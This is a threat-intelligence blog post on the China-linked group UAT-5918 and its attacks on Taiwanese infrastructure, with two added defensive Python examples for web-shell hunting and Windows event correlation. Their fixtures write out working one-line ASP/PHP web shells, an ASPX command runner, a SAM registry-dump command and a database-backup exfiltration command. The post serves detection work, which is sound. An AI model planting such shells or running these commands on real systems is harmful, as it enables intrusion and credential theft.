UAT-5918: China-Linked APT Targets Critical Infrastructure in Taiwan
TL;DR
Cisco Talos identified UAT-5918, a threat actor targeting Taiwan’s critical infrastructure using web shells and open-source tools. The group, linked to China, exploits unpatched servers for long-term access and credential theft. Their tactics overlap with other Chinese APT groups, including Volt Typhoon and Flax Typhoon.
UAT-5918: A New Threat to Taiwan’s Critical Infrastructure
Cisco Talos has uncovered an information-stealing threat actor, UAT-5918, active since at least 2023. The group relies on web shells and open-source tools rather than custom malware to maintain persistence and carry out credential theft, primarily against Taiwan's critical sectors.
Targeted Sectors and Tactics
UAT-5918 focuses on Taiwan’s telecom, healthcare, IT, and critical infrastructure sectors. The group exploits N-day vulnerabilities in unpatched servers to gain long-term access. Their post-compromise activities include:
- Reconnaissance and Credential Theft: Using open-source tools for network discovery and credential harvesting.
- Persistence: Deploying web shells across subdomains and creating admin accounts.
- Lateral Movement: Pivoting over RDP, Impacket and PowerShell remoting, with FRP tunnels for remote access and credentials harvested by Mimikatz.
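A file-based hunt for the ASP/ASPX and PHP web shells described above, as an added example that is not part of the Talos report or of the original post. It scores every server-side script under a web root on the constructs a web shell needs (code execution driven by request input) and flags files at or above a threshold, so a lone `system()` call in an admin script does not fire while `eval(Request...)` does. The signatures, their weights, the threshold and the sample web root are assumptions constructed for this example.

```python
"""Hunt for ASP/ASPX/PHP web shells in a web root (added example).

Each script file is scored on constructs a web shell needs: code execution
(eval/Execute/Process.Start/system) fed by request input. Signatures,
weights and the threshold are assumptions chosen for this example.
"""
import re
import tempfile
from pathlib import Path

# (name, pattern, weight): "eval(Request...)" is damning on its own, while
# exec-style calls only cross the threshold when combined with request input.
SIGNATURES = [
    ("asp_eval_request",    re.compile(r"\beval\s*\(\s*Request\b", re.I), 5),
    ("asp_execute_request", re.compile(r"\bExecute(?:Global)?\s*\(\s*Request\b", re.I), 5),
    ("aspx_process_start",  re.compile(r"\bProcess\.Start\s*\(|\bProcessStartInfo\b", re.I), 3),
    ("aspx_request_input",  re.compile(r"\bRequest(?:\.Form|\.QueryString|\.Item|\[)", re.I), 1),
    ("php_eval_input",      re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I), 5),
    ("php_exec_func",       re.compile(r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I), 3),
    ("php_request_input",   re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I), 1),
    ("eval_decoded_blob",   re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 5),
    ("dotnet_reflection",   re.compile(r"\bAssembly\.Load\s*\(", re.I), 2),
]
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".phtml"}
THRESHOLD = 4  # assumed alert threshold; tune against your own web roots


def scan_file(path):
    """Score one file; hits are the distinct signature names that matched."""
    text = Path(path).read_text(encoding="utf-8", errors="ignore")
    hits = [name for name, rx, _ in SIGNATURES if rx.search(text)]
    score = sum(w for name, _, w in SIGNATURES if name in hits)
    return {"score": score, "hits": hits}


def scan_webroot(root, threshold=THRESHOLD):
    """Return {relative_path: result} for every script file at or above threshold."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTENSIONS:
            result = scan_file(path)
            if result["score"] >= threshold:
                findings[path.relative_to(root).as_posix()] = result
    return findings


# Constructed sample web root: two classic one-line shells, one hand-rolled
# command runner, and three benign files that must not fire.
SAMPLE_WEBROOT = {
    "uploads/cmd.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "img/thumb.php": "<?php @eval($_POST['x']); ?>",
    "admin/run.aspx": '''<%@ Page Language="C#" %>
<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request.Form["c"]);
   psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
   Response.Write(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd()); %>''',
    "index.php": '<?php echo htmlspecialchars($_GET["q"] ?? ""); ?>',
    "tools/backup.php": "<?php echo shell_exec('tar czf /tmp/www.tgz /var/www'); ?>",
    "static/app.js": "console.log('not a server-side script');",
}


def build_sample_webroot(root):
    """Write the constructed sample files under root."""
    for rel, body in SAMPLE_WEBROOT.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


def demo():
    """Build the sample web root in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, res in sorted(demo().items(), key=lambda kv: -kv[1]["score"]):
        print(f"{res['score']:>2}  {rel}  {', '.join(res['hits'])}")
```

Run it against a real web root with `scan_webroot("/inetpub/wwwroot")`; pair the scores with file modification times and the web server's access log, since a shell dropped on an unpatched server is usually a recently written file that only the attacker's source addresses ever request.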
Links to Chinese APT Groups
Researchers have linked UAT-5918 to China due to overlaps in tactics, techniques, and procedures (TTPs) with multiple Chinese APT groups, including:
- Volt Typhoon: Known for living-off-the-land techniques and long-term access.
- Flax Typhoon: Uses legitimate software to quietly access Taiwanese organizations.
- Dalbit: Engages in targeted attacks against critical infrastructure.
The overlaps include the use of tools like FRP, Earthworm, and Impacket, as well as the absence of custom-made malware.
Unique Tooling and Persistence Mechanisms
UAT-5918 employs a mix of common and unique tools:
- FRP and Neo-reGeorg: For establishing reverse proxy tunnels.
- LaZagne, SNetCracker, and PortBrute: Tools not publicly linked to other groups, suggesting exclusive use.
- Web Shells and JuicyPotato: Web shells dropped deep in system directories for persistence, and JuicyPotato for local privilege escalation.
Data Exfiltration and Long-Term Access
The group maintains persistent access by:
- Deploying ASP and PHP web shells.
- Using JuicyPotato for privilege escalation.
- Creating backdoored admin accounts.
- Stealing credentials via Mimikatz, LaZagne, and registry dumps.
- Pivoting within networks using RDP, Impacket, and brute-force tools.
- Exfiltrating data, including confidential files and database backups created with SQLCMD.
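The persistence, credential-theft and exfiltration steps listed above leave a recognisable trail in Windows Security and Sysmon telemetry. The following correlation logic is an added example, not Talos tooling or anything from the original post: it flags a web-server worker process spawning a shell, a user account created and then added to Administrators within a short window, registry hive dumps or known credential-dumping binaries, and SQLCMD invoking `BACKUP DATABASE`. The event records, the 15-minute window and the assumption that 4732 carries a resolved `MemberName` are constructed for this example; real 4732 records carry a `MemberSid` you would resolve first.

```python
"""Correlate Windows Security and Sysmon events for the UAT-5918
post-compromise chain: web shell spawning a shell, a fresh account added to
Administrators, credential dumping, SQLCMD database backups.
Added example; the events below are constructed, not real telemetry."""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

ADMINISTRATORS_SID = "S-1-5-32-544"                      # BUILTIN\Administrators
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}   # IIS / PHP / Apache workers
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
CRED_TOOLS = {"mimikatz.exe", "lazagne.exe"}             # as shipped; renamed copies need other rules
REG_HIVE_DUMP = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I)
SQLCMD_BACKUP = re.compile(r"\bsqlcmd(?:\.exe)?\b.*\bBACKUP\s+DATABASE\b", re.I | re.S)
ADMIN_WINDOW = timedelta(minutes=15)   # assumed: created-then-promoted inside this window is suspicious


def _name(image):
    return PureWindowsPath(image).name.lower()


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def process_rules(event):
    """Stateless checks on one Sysmon EID 1 (process create) record."""
    if event.get("Channel") != "Sysmon" or event.get("EventID") != 1:
        return []
    image, parent = _name(event["Image"]), _name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    alerts = []
    if parent in WEB_WORKERS and image in SHELLS:
        alerts.append("webshell_spawned_shell")
    if image in CRED_TOOLS or REG_HIVE_DUMP.search(cmd):
        alerts.append("credential_dumping")
    if SQLCMD_BACKUP.search(cmd):
        alerts.append("sqlcmd_database_backup")
    return alerts


def backdoor_admin_accounts(events, window=ADMIN_WINDOW):
    """Stateful: 4720 (user created) followed by 4732 adding that user to Administrators."""
    created, hits = {}, []
    for ev in sorted((e for e in events if e.get("Channel") == "Security"), key=_ts):
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = _ts(ev)
        elif ev["EventID"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            member = ev.get("MemberName", "").lower()   # assumed already resolved from MemberSid
            if member in created and _ts(ev) - created[member] <= window:
                hits.append(member)
    return hits


def triage(events):
    """Run every rule and group the evidence by alert name."""
    alerts = {}
    for ev in events:
        for name in process_rules(ev):
            alerts.setdefault(name, []).append(ev.get("CommandLine") or ev["Image"])
    admins = backdoor_admin_accounts(events)
    if admins:
        alerts["backdoor_admin_account"] = admins
    return alerts


# Constructed event stream: four malicious records, then benign noise that must not fire.
SAMPLE_EVENTS = [
    {"Channel": "Sysmon", "EventID": 1, "Time": "2025-03-10T02:14:05",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'cmd.exe /c "whoami /all"'},
    {"Channel": "Security", "EventID": 4720, "Time": "2025-03-10T02:15:30", "TargetUserName": "itsupport2"},
    {"Channel": "Security", "EventID": 4732, "Time": "2025-03-10T02:16:02",
     "TargetSid": ADMINISTRATORS_SID, "MemberName": "itsupport2"},
    {"Channel": "Sysmon", "EventID": 1, "Time": "2025-03-10T02:20:11",
     "Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Windows\Temp\sam.hiv"},
    {"Channel": "Sysmon", "EventID": 1, "Time": "2025-03-10T02:31:40",
     "Image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'SQLCMD.EXE -S localhost -E -Q "BACKUP DATABASE CustomerDB TO DISK=\'C:\\Temp\\c.bak\'"'},
    {"Channel": "Security", "EventID": 4720, "Time": "2025-03-10T09:00:00", "TargetUserName": "newhire.lee"},
    {"Channel": "Security", "EventID": 4732, "Time": "2025-03-10T09:10:00",
     "TargetSid": "S-1-5-32-555", "MemberName": "newhire.lee"},   # Remote Desktop Users, not Administrators
    {"Channel": "Sysmon", "EventID": 1, "Time": "2025-03-10T09:05:00",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for name, evidence in triage(SAMPLE_EVENTS).items():
        print(name, "->", evidence)
```

The web-worker-to-shell rule is the highest-value one here: a web shell has no way to run commands except through the worker process, so `w3wp.exe` spawning `cmd.exe` or `powershell.exe` is rare on a healthy IIS host and should be alerted on regardless of command line. The account rule needs the window because ordinary onboarding also creates accounts; it is the create-then-promote sequence from the same compromised host that marks a backdoor.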
Indicators of Compromise (IOCs)
Talos researchers have published IOCs on their GitHub repository for further analysis and defense.
Conclusion
UAT-5918 represents a significant threat to Taiwan’s critical infrastructure, employing sophisticated tactics and tools to maintain long-term access. The overlaps with other Chinese APT groups highlight the need for enhanced cybersecurity measures to protect against such persistent threats.
Additional Resources
For more details, visit the full article: source